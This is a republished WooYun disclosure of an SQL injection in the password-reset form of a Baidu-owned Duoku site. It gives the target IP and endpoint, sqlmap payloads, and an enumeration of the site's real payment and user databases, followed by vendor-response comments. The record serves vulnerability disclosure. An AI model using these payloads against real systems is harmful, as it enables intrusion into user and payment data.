百度旗下某站SQL注入漏洞

admin
admin
admin
140488
文章
117
评论
2015年5月1日15:54:33评论331 views字数 208阅读0分41秒阅读模式
摘要

2014-07-18: 细节已通知厂商并且等待厂商处理中
2014-07-18: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-07-23: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2014-68943

漏洞标题: 百度旗下某站SQL注入漏洞

相关厂商: duoku.com

漏洞作者: 乐乐、

提交时间: 2014-07-18 13:33

公开时间: 2014-07-23 18:17

漏洞类型: SQL注射漏洞

危害等级: 低

自评Rank: 1

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2014-07-18: 细节已通知厂商并且等待厂商处理中
2014-07-18: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-07-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

百度就是快,跑起数据来也是,杠杠的,不错。

详细说明:

貌似登录之后才可以测试,是在找回密码处。

POST:

code 区域 
http://111.13.96.20:80/auth/forgotpwd-two (POST)
 username=1
code 区域 
sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
 ---
 Place: POST
 Parameter: username
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: username=1' AND 6436=6436 AND 'thpJ'='thpJ
     Vector: AND [INFERENCE]
 
     Type: UNION query
     Title: MySQL UNION query (NULL) - 8 columns
     Payload: username=-3884' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7172766c71,0x4d68646a4a7358587675,0x716b6f6f71),NULL,NULL,NULL,NULL#
     Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL#
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: username=1' AND SLEEP(5) AND 'HlqX'='HlqX
     Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
 ---
 web application technology: PHP 5.2.8
 back-end DBMS: MySQL 5.0.11
 available databases [8]:
 [*] information_schema
 [*] mcp_pay
 [*] mcp_user
 [*] mysql
 [*] openapi
 [*] performance_schema
 [*] slow
 [*] test
 
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: POST
 Parameter: username
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: username=1' AND 6436=6436 AND 'thpJ'='thpJ
     Vector: AND [INFERENCE]
 
     Type: UNION query
     Title: MySQL UNION query (NULL) - 8 columns
     Payload: username=-3884' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7172766c71,0x4d68646a4a7358587675,0x716b6f6f71),NULL,NULL,NULL,NULL#
     Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL#
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: username=1' AND SLEEP(5) AND 'HlqX'='HlqX
     Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
 ---
 web application technology: PHP 5.2.8
 back-end DBMS: MySQL 5.0.11
 Database: mcp_user
 [85 tables]
 +----------------------------------------------+
 | mcp_mt_log_2014-06-09                        |
 | mcp_mt_log_2014-06-10                        |
 | mcp_mt_log_2014-06-11                        |
 | mcp_mt_log_2014-06-12                        |
 | mcp_mt_log_2014-06-13                        |
 | mcp_mt_log_2014-06-14                        |
 | mcp_mt_log_2014-06-15                        |
 | mcp_mt_log_2014-06-16                        |
 | mcp_mt_log_2014-06-17                        |
 | mcp_mt_log_2014-06-18                        |
 | mcp_mt_log_2014-06-19                        |
 | mcp_mt_log_2014-06-20                        |
 | mcp_mt_log_2014-06-21                        |
 | mcp_mt_log_2014-06-22                        |
 | mcp_mt_log_2014-06-23                        |
 | mcp_mt_log_2014-06-24                        |
 | mcp_mt_log_2014-06-25                        |
 | mcp_mt_log_2014-06-26                        |
 | mcp_mt_log_2014-06-27                        |
 | mcp_mt_log_2014-06-28                        |
 | mcp_mt_log_2014-06-29                        |
 | mcp_mt_log_2014-06-30                        |
 | mcp_mt_log_2014-07-01                        |
 | mcp_mt_log_2014-07-02                        |
 | mcp_mt_log_2014-07-03                        |
 | mcp_mt_log_2014-07-04                        |
 | mcp_mt_log_2014-07-05                        |
 | mcp_mt_log_2014-07-06                        |
 | mcp_mt_log_2014-07-07                        |
 | mcp_mt_log_2014-07-08                        |
 | mcp_mt_log_2014-07-09                        |
 | mcp_mt_log_2014-07-10                        |
 | mcp_mt_log_2014-07-11                        |
 | mcp_mt_log_2014-07-12                        |
 | mcp_mt_log_2014-07-13                        |
 | mcp_mt_log_2014-07-14                        |
 | mcp_mt_log_2014-07-15                        |
 | mcp_mt_log_2014-07-16                        |
 | mcp_mt_log_2014-07-17                        |
 | mcp_mt_log_2014-07-18                        |
 | mcp_mt_log_2014-07-19                        |
 | mcp_mt_log_2014-07-20                        |
 | mcp_mt_log_2014-07-21                        |
 | mcp_mt_log_2014-07-22                        |
 | mcp_mt_log_2014-07-23                        |
 | mcp_mt_log_2014-07-24                        |
 | mcp_mt_log_2014-07-25                        |
 | mcp_mt_log_2014-07-26                        |
 | mcp_mt_log_2014-07-27                        |
 | mcp_mt_log_2014-07-28                        |
 | mcp_mt_log_2014-07-29                        |
 | mcp_mt_log_2014-07-30                        |
 | mcp_mt_log_2014-07-31                        |
 | mcp_mt_log_2014-08-01                        |
 | mcp_mt_log_2014-08-02                        |
 | mcp_auto_register                            |
 | mcp_baidu_visitor                            |
 | mcp_feedback_channel                         |
 | mcp_feedback_type                            |
 | mcp_mo_log                                   |
 | mcp_mt_log                                   |
 | mcp_sms_code                                 |
 | mcp_smscode_type                             |
 | mcp_sys_reply                                |
 | mcp_user_91                                  |
 | mcp_user_baidu                               |
 | mcp_user_extension                           |
 | mcp_user_feedback                            |
 | mcp_user_feedback_dealwith                   |
 | mcp_user_fr                                  |
 | mcp_user_fr_type                             |
 | mcp_user_info                                |
 | mcp_user_log_type                            |
 | mcp_user_log_typecode                        |
 | mcp_user_ori                                 |
 | mcp_user_qudao                               |
 | mcp_user_third                               |
 | mcp_user_uselog                              |
 | mcp_user_version                             |
 | mcp_visitor_info                             |
 | ricktest                                     |
 | user_phone_bind                              |
 | user_realname_auth                           |
 | user_register_type                           |
 | yxjd_uid_info                                |
 +----------------------------------------------+
 
 Database: performance_schema
 [17 tables]
 +----------------------------------------------+
 | cond_instances                               |
 | events_waits_current                         |
 | events_waits_history                         |
 | events_waits_history_long                    |
 | events_waits_summary_by_instance             |
 | events_waits_summary_by_thread_by_event_name |
 | events_waits_summary_global_by_event_name    |
 | file_instances                               |
 | file_summary_by_event_name                   |
 | file_summary_by_instance                     |
 | mutex_instances                              |
 | performance_timers                           |
 | rwlock_instances                             |
 | setup_consumers                              |
 | setup_instruments                            |
 | setup_timers                                 |
 | threads                                      |
 +----------------------------------------------+
 
 Database: mcp_pay
 [82 tables]
 +----------------------------------------------+
 | Activity_Info                                |
 | Alipay_History                               |
 | Alipay_PC_History                            |
 | Apexs_history                                |
 | BaiFuBao_Recharge_Record                     |
 | Baifubao_History                             |
 | BeiWei_Mo_Info                               |
 | Card_Info                                    |
 | Channel_Info                                 |
 | Channel_type                                 |
 | CreditCard_BindId_Phone                      |
 | Duokoo_Account_Info                          |
 | Exchange_Rate                                |
 | External_Channel_Info                        |
 | GPP_log                                      |
 | Game_Coorperation_Info                       |
 | HuaJian_History                              |
 | HuanJian_SingleBook                          |
 | Kefu_Operation_Log                           |
 | Kongzhong_Get_Mo                             |
 | Kuaiqian_Netway_History                      |
 | Kubi_Pay_Info                                |
 | LianTongWo_YueDu_History                     |
 | LianTong_Wo_History                          |
 | Liandong_Netway_History                      |
 | Mo9_Recharge_History                         |
 | Pay_Channel_Info                             |
 | Pay_Info                                     |
 | Pay_Netway_Info                              |
 | Pay_Relation                                 |
 | Pay_Type_Info                                |
 | Phone_Pay_Info                               |
 | Present_Info                                 |
 | Present_Strategy_Info                        |
 | Product_Type_Info                            |
 | RDO_Recharge_History                         |
 | Recharge_Card_info                           |
 | Recharge_Channel_Info                        |
 | Recharge_Info                                |
 | Recharge_MM_Phone_Info                       |
 | Recharge_NetWay_Submit_Info                  |
 | Recharge_Notify_Stat                         |
 | Recharge_Phone_info                          |
 | Recharge_Type                                |
 | ShenZhouFu_History                           |
 | ShengFengyj_History                          |
 | ShengFengyj_SingleBook                       |
 | Singlebook_Record_Info                       |
 | SouHu_Unicom_History                         |
 | Sub_Channel_Info                             |
 | TenPay_History                               |
 | TenPay_PC_History                            |
 | TianYi_Sms_History                           |
 | Timing_Present_Info                          |
 | Tyxk_Mo_Info                                 |
 | Tyxk_Send_Status                             |
 | Tyxk_Subscribe_Info                          |
 | Tyxk_Wap_Info                                |
 | UMP_Netway_History                           |
 | UMP_Netway_History_yx                        |
 | UPMP_Recharge_History                        |
 | User_Account_Info                            |
 | User_Phone_Relation                          |
 | YeePay_Credit_History                        |
 | Yiao_Netway_History                          |
 | Yibao_Bank_History                           |
 | YidongMM_History                             |
 | YidongMM_Sms_SingleBook                      |
 | YidongMM_WAP_History                         |
 | Youxijidi_ShortKey                           |
 | Youxijidi_Wap_History                        |
 | Youxijidi_Wap_History_Yx                     |
 | alipay_preceate_res                          |
 | hunandianxin_log                             |
 | liandong_sms_recharge_yx                     |
 | mcp_channel_info                             |
 | mcp_cp_info                                  |
 | mcp_fr_info                                  |
 | mcp_wapgame_type                             |
 | qrcode_cp_order                              |
 | sinapay_log                                  |
 | sms_rechargeinfo_souhu                       |
 +----------------------------------------------+
 
 Database: openapi
 [40 tables]
 +----------------------------------------------+
 | GSDK_Alipay_History                          |
 | GSDK_HuaJian_History                         |
 | GSDK_ShengFeng_History                       |
 | GSDK_UMP_Netway_history                      |
 | GSDK_card_recharge_history                   |
 | Gsdk_CreditCard_BindId_Phone                 |
 | Gsdk_PalmCard_BindId_Phone                   |
 | Gsdk_PayChannel_Info                         |
 | Gsdk_YeePay_Credit_History                   |
 | Record_ShengFeng_History_Ex                  |
 | Record_Telecom_Pay_History                   |
 | Record_Unicom_Pay_History                    |
 | ShengFengLTYX_SMS_History                    |
 | cp_game_version_info                         |
 | cp_order_info                                |
 | gamemsgapi_channelprefix                     |
 | gsdk_order_info                              |
 | gsdk_paypalm_recharge_res_record             |
 | gsdk_playgame_online_time                    |
 | gsdk_yibao_recharge_history                  |
 | ios_order_record                             |
 | ios_order_recordbak                          |
 | ios_order_recordbak0619                      |
 | qpmsg_cp_order_info                          |
 | record_MMarket_history                       |
 | record_fenghuangshi_history                  |
 | record_fenghuangshiapidy_history             |
 | record_gamebaseh5_history                    |
 | record_kjcx_history                          |
 | record_ltsk_sync_history                     |
 | record_mdo_history                           |
 | record_mo9_history                           |
 | record_tcdclt_sync_history                   |
 | record_woreadermsg_history                   |
 | record_woreadersdk_history                   |
 | record_wostoresdk_history                    |
 | record_zhongkazhihui_history                 |
 | sdk_version_info                             |
 | wawa_ftpfile_statics_daily                   |
 | wawa_pay_history                             |
 +----------------------------------------------+
 
 Database: mysql
 [24 tables]
 +----------------------------------------------+
 | user                                         |
 | columns_priv                                 |
 | db                                           |
 | event                                        |
 | func                                         |
 | general_log                                  |
 | help_category                                |
 | help_keyword                                 |
 | help_relation                                |
 | help_topic                                   |
 | host                                         |
 | ndb_binlog_index                             |
 | plugin                                       |
 | proc                                         |
 | procs_priv                                   |
 | proxies_priv                                 |
 | servers                                      |
 | slow_log                                     |
 | tables_priv                                  |
 | time_zone                                    |
 | time_zone_leap_second                        |
 | time_zone_name                               |
 | time_zone_transition                         |
 | time_zone_transition_type                    |
 +----------------------------------------------+
 
 Database: information_schema
 [65 tables]
 +----------------------------------------------+
 | CHARACTER_SETS                               |
 | CLIENT_STATISTICS                            |
 | COLLATIONS                                   |
 | COLLATION_CHARACTER_SET_APPLICABILITY        |
 | COLUMNS                                      |
 | COLUMN_PRIVILEGES                            |
 | ENGINES                                      |
 | EVENTS                                       |
 | FILES                                        |
 | GLOBAL_STATUS                                |
 | GLOBAL_TEMPORARY_TABLES                      |
 | GLOBAL_VARIABLES                             |
 | INDEX_STATISTICS                             |
 | INNODB_BUFFER_PAGE                           |
 | INNODB_BUFFER_PAGE_LRU                       |
 | INNODB_BUFFER_POOL_PAGES                     |
 | INNODB_BUFFER_POOL_PAGES_BLOB                |
 | INNODB_BUFFER_POOL_PAGES_INDEX               |
 | INNODB_BUFFER_POOL_STATS                     |
 | INNODB_CHANGED_PAGES                         |
 | INNODB_CMP                                   |
 | INNODB_CMPMEM                                |
 | INNODB_CMPMEM_RESET                          |
 | INNODB_CMP_RESET                             |
 | INNODB_INDEX_STATS                           |
 | INNODB_LOCKS                                 |
 | INNODB_LOCK_WAITS                            |
 | INNODB_RSEG                                  |
 | INNODB_SYS_COLUMNS                           |
 | INNODB_SYS_FIELDS                            |
 | INNODB_SYS_FOREIGN                           |
 | INNODB_SYS_FOREIGN_COLS                      |
 | INNODB_SYS_INDEXES                           |
 | INNODB_SYS_STATS                             |
 | INNODB_SYS_TABLES                            |
 | INNODB_SYS_TABLESTATS                        |
 | INNODB_TABLE_STATS                           |
 | INNODB_TRX                                   |
 | INNODB_UNDO_LOGS                             |
 | KEY_COLUMN_USAGE                             |
 | PARAMETERS                                   |
 | PARTITIONS                                   |
 | PLUGINS                                      |
 | PROCESSLIST                                  |
 | PROFILING                                    |
 | QUERY_RESPONSE_TIME                          |
 | REFERENTIAL_CONSTRAINTS                      |
 | ROUTINES                                     |
 | SCHEMATA                                     |
 | SCHEMA_PRIVILEGES                            |
 | SESSION_STATUS                               |
 | SESSION_VARIABLES                            |
 | STATISTICS                                   |
 | TABLES                                       |
 | TABLESPACES                                  |
 | TABLE_CONSTRAINTS                            |
 | TABLE_PRIVILEGES                             |
 | TABLE_STATISTICS                             |
 | TEMPORARY_TABLES                             |
 | THREAD_STATISTICS                            |
 | TRIGGERS                                     |
 | USER_PRIVILEGES                              |
 | USER_STATISTICS                              |
 | VIEWS                                        |
 | XTRADB_ADMIN_COMMAND                         |
 +----------------------------------------------+

漏洞证明:

百度旗下某站SQL注入漏洞

百度旗下某站SQL注入漏洞

修复方案:

你们懂

版权声明:转载请注明来源 乐乐、@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-23 18:17

厂商回复:

漏洞Rank:10 (WooYun评价)

最新状态:

2014-07-23:非常感谢,流动已修复

2014-07-23:非常感谢,漏洞已修复

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-07-18 13:54 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

    1

    什么意思?

  2. 2014-07-23 20:11 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

    0

    这厂商太贱了。。。太贱了。。。。贱死了。。。。 @xsser @疯狗

  3. 2014-07-23 22:40 | 小怿 ( 实习白帽子 | Rank:31 漏洞数:7 | )

    0

    忽略了还修复。。打错了字还在打一遍。。

  4. 2014-07-23 23:20 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

    0

    @小怿 这厂商太犯贱。

  5. 2014-08-01 07:13 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    0

    这厂商太犯贱。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin